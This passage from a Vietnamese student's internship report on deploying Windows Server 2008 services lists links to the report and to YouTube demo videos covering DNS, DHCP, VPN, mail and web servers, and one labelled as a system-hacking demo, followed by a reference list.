này. KẾT QUẢ ĐẠT ĐƯỢC File Word: Báo cáo cuối kì: http://www.slideshare.net/tuancaonguyen File Video: Local Policy : https://www.youtube.com/watch?v=vAQwiwFD1ao Domain : https://www.youtube.com/watch?v=618Gd3hvdPk DNS: https://www.youtube.com/watch?v=rqAJ7rDuozg DHCP Local : https://www.youtube.com/watch?v=mz3g0_anpLY VPN site to site: https://www.youtube.com/watch?v=XJKeoJ-nk_w VPN client to site : https://www.youtube.com/watch?v=5iGcEPJ69CM Mail Server VPS : https://www.youtube.com/watch?v= maANFjsk1c Web Server VPS : https://www.youtube.com/watch?v=KJ43Cdgfdsw System Hacking ms10_042: https://www.youtube.com/watch?v=cJ7z9HHqZC0&feature=youtu.be
  88. 88. Nghiên cứu và triển khai các dịch vụ trên Window Server 2008 Sinh viên thực tập: Nguyễn Cao Tuấn Trang 88 DANH MỤC TÀI LIỆU THAM KHẢO [1] Giới thiệu về Domain Controller http://vi.scribd.com/doc/90148298/9/Gi%E1%BB%9Bi-thi%E1%BB%87u- v%E1%BB%81-Domain-Controller [2] Lab quản trị mạng MCSA-70-640 – Trung tâm Athena [3] Lab quản trị mạng MCSA-70-642 – Trung tâm Athena [4]Backup và Restore Active Diectory http://www.nhatnghe.com/forum/showthread.php?t=23162 [5]doko.vn-232851-Chi-tiet-cac-dich-vu-mang-tren-Server-2k [6] http://giaotrinhcntt.com/ [7] http://www.quantrimang.com

×